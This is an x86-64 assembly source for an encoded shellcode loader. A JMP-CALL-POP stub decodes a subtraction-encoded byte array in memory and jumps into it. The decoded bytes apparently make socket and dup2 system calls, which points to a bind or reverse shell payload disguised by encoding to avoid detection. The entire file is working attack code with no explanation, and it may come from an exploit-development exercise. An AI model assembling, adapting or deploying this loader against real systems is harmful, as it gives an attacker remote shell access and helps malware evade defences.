global _start

section .text

_start:
   jmp short exec_shellcode

start_decoding:
    pop rsi
    xor rcx, rcx
    xor rbx, rbx

    sub_loop:
	push rbx   
        mov al, byte [rsi+rcx]
        inc rcx
	mov bl, byte [rsi+rcx]
	inc rcx
        sub al, bl
	pop rbx
        mov byte [rsi+rbx], al
	inc rbx
        cmp rbx, 121
        jne sub_loop

    xor rcx, rcx
    mov al, 0x90

    nul_loop:
	mov byte [rsi+rcx+121], al
	inc rcx
	cmp rcx, 121
	jne nul_loop	

    jmp rsi
    
exec_shellcode:
    call start_decoding
    shellcode: db   0x74, 0x0a, 0x32, 0x09, 0x60, 0x08, 0x74, 0x0a, 0x04, 0x02, 0x6e, 0x0f, 0x74, 0x0a, 0x02, 0x01, 0x6c, 0x0e, 0xa2, 0x09, 0x1e, 0x0f, 0x0a, 0x05, 0x50, 0x08, 0x92, 0x09, 0xca, 0x05, 0x50, 0x08, 0xc0, 0x08, 0x02, 0x01, 0x02, 0x01, 0x02, 0x01, 0x02, 0x01, 0x02, 0x01, 0x02, 0x01, 0x02, 0x01, 0x04, 0x02, 0x51, 0x01, 0x50, 0x08, 0xc0, 0x08, 0x06, 0x03, 0x02, 0x01, 0x2e, 0x0f, 0x61, 0x01, 0x8c, 0x0e, 0x02, 0x01, 0x02, 0x01, 0x06, 0x03, 0x50, 0x08, 0x32, 0x01, 0x08, 0x04, 0x28, 0x04, 0x74, 0x0a, 0x34, 0x0a, 0x60, 0x08, 0x50, 0x08, 0x92, 0x09, 0xfe, 0x0f, 0x74, 0x0a, 0x11, 0x01, 0x64, 0x0a, 0x50, 0x08, 0x92, 0x09, 0xec, 0x06, 0x1e, 0x0f, 0x0a, 0x05, 0x74, 0x0a, 0x06, 0x03, 0x6c, 0x0e, 0x50, 0x08, 0x0e, 0x0f, 0xdc, 0x0e, 0x80, 0x08, 0x16, 0x0b, 0x5c, 0x06, 0x74, 0x0a, 0x22, 0x01, 0x60, 0x08, 0x50, 0x08, 0x92, 0x09, 0xfe, 0x0f, 0x1e, 0x0f, 0x0a, 0x05, 0xf6, 0x0b, 0xfe, 0x0f, 0x74, 0x0a, 0x70, 0x08, 0x50, 0x08, 0xc0, 0x08, 0x3e, 0x0f, 0x64, 0x02, 0x72, 0x09, 0x7c, 0x0e, 0x3e, 0x0f, 0x3e, 0x0f, 0x3e, 0x0f, 0x76, 0x03, 0x51, 0x01, 0x50, 0x08, 0x92, 0x09, 0xee, 0x07, 0x70, 0x08, 0x74, 0x02, 0x72, 0x09, 0x02, 0x01, 0x02, 0x01, 0x82, 0x01, 0x38, 0x04, 0x28, 0x04, 0x02, 0x01, 0x02, 0x01, 0x02, 0x01, 0x02, 0x01, 0x32, 0x01, 0xfc, 0x06, 0x5c, 0x06, 0x74, 0x0a, 0x10, 0x08, 0x6c, 0x0e, 0x50, 0x08, 0x02, 0x01, 0xec, 0x06, 0x5c, 0x06, 0x50, 0x08, 0x92, 0x09, 0xec, 0x06, 0x32, 0x01, 0xd4, 0x02, 0x74, 0x0a, 0x46, 0x0b, 0x60, 0x08, 0x1e, 0x0f, 0x0a, 0x05
